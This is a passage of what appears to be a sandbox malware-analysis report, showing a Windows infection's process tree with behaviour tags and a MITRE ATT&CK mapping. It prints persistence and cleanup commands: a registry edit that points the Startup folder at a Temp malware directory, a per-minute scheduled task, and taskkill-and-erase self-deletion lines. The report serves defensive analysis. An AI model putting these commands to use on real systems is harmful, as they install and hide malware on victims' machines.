        "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"
        14⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1320
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
        15⤵
        
        PID:5728
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
        16⤵
        
        PID:7376
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F
        15⤵
        Creates scheduled task(s)
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\Pgnm5Zfs0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Pgnm5Zfs0.exe"
        13⤵
        Executes dropped EXE
        
        PID:7544
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:2720
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:3352
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        
        PID:4740
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri155442fc38b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:892
    - - C:\Users\Admin\AppData\Local\Temp\7zSC6266554\Fri155442fc38b.exe
        
        Fri155442fc38b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1680
      - C:\Users\Admin\AppData\Roaming\6170962.exe
        
        "C:\Users\Admin\AppData\Roaming\6170962.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5100
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:5400
      - C:\Users\Admin\AppData\Roaming\4644226.exe
        
        "C:\Users\Admin\AppData\Roaming\4644226.exe"
        6⤵
        Executes dropped EXE
        
        PID:4568
      - C:\Users\Admin\AppData\Roaming\7157114.exe
        
        "C:\Users\Admin\AppData\Roaming\7157114.exe"
        6⤵
        Executes dropped EXE
        
        PID:5212
      - C:\Users\Admin\AppData\Roaming\8395340.exe
        
        "C:\Users\Admin\AppData\Roaming\8395340.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4756
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4756 -s 1988
        7⤵
        Program crash
        
        PID:7808
      - C:\Users\Admin\AppData\Roaming\8972360.exe
        
        "C:\Users\Admin\AppData\Roaming\8972360.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5596
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri157e25afd971.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5112
    - - C:\Users\Admin\AppData\Local\Temp\7zSC6266554\Fri157e25afd971.exe
        
        Fri157e25afd971.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2192
      - C:\Users\Admin\AppData\Local\Temp\is-GVS26.tmp\Fri157e25afd971.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GVS26.tmp\Fri157e25afd971.tmp" /SL5="$501EE,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC6266554\Fri157e25afd971.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Suspicious use of WriteProcessMemory
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\is-9RQ8K.tmp\zab2our.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-9RQ8K.tmp\zab2our.exe" /S /UID=burnerch2
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4320
        
        C:\Program Files\VideoLAN\BBBXTCBXGR\ultramediaburner.exe
        
        "C:\Program Files\VideoLAN\BBBXTCBXGR\ultramediaburner.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\is-L39VN.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-L39VN.tmp\ultramediaburner.tmp" /SL5="$5028A,281924,62464,C:\Program Files\VideoLAN\BBBXTCBXGR\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:2620
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:6056
        
        C:\Users\Admin\AppData\Local\Temp\68-8d599-c2e-f719a-ec9c2769f5d70\Rimiwyjoci.exe
        
        "C:\Users\Admin\AppData\Local\Temp\68-8d599-c2e-f719a-ec9c2769f5d70\Rimiwyjoci.exe"
        8⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:3880
        
        C:\Users\Admin\AppData\Local\Temp\e8-f0d28-859-4b99e-c060ff892bcce\Rokapohiri.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e8-f0d28-859-4b99e-c060ff892bcce\Rokapohiri.exe"
        8⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:5144
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rei10o5d.14q\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\rei10o5d.14q\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\rei10o5d.14q\GcleanerEU.exe /eufive
        10⤵
        Executes dropped EXE
        
        PID:6796
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\rei10o5d.14q\GcleanerEU.exe" & exit
        11⤵
        
        PID:5728
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "GcleanerEU.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:7484
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x22iffyp.urp\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:6420
        
        C:\Users\Admin\AppData\Local\Temp\x22iffyp.urp\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\x22iffyp.urp\installer.exe /qn CAMPAIGN="654"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:728
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\x22iffyp.urp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\x22iffyp.urp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630661051 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:7328
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ixgmerc1.xzg\anyname.exe & exit
        9⤵
        
        PID:6776
        
        C:\Users\Admin\AppData\Local\Temp\ixgmerc1.xzg\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\ixgmerc1.xzg\anyname.exe
        10⤵
        Executes dropped EXE
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\ixgmerc1.xzg\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ixgmerc1.xzg\anyname.exe" -u
        11⤵
        Executes dropped EXE
        
        PID:6896
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wxnwhfpt.yvy\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:7104
        
        C:\Users\Admin\AppData\Local\Temp\wxnwhfpt.yvy\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\wxnwhfpt.yvy\gcleaner.exe /mixfive
        10⤵
        Executes dropped EXE
        
        PID:4224
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\wxnwhfpt.yvy\gcleaner.exe" & exit
        11⤵
        
        PID:6752
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:7668
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5rcz4hgk.j41\autosubplayer.exe /S & exit
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6324

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:5036

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:900
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4820

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2192
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:5488

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:5020

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6976

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:7116

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:6396
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding DDF2F259167746148726FC574D70F80E C
  2⤵
  - Loads dropped DLL
  PID:6888
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 510C4960CA3BCC72046EF0874F02F0A4
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:7432
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:7944
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 042896F3F55912C622D22EC016EDF3E3 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:8108

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7220

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:7596

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8184

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7300
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:6840

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:8048

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7820

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
1⤵
PID:5720
- C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
  2⤵
  - Modifies system executable filetype association
  - Adds Run key to start application
  - Modifies Internet Explorer settings
  - Modifies registry class
  PID:7944
- - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe
    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies registry class
    PID:6860

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5148

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8036

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:7280

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6652

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6964

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7848

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:6212

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8060

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:6720

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5204

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
1⤵
PID:7436

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1580

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3668

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:6632

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x408
1⤵
PID:4552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2512

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4000

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8044

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:7244

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1516

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Change Default File Association

T1042

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery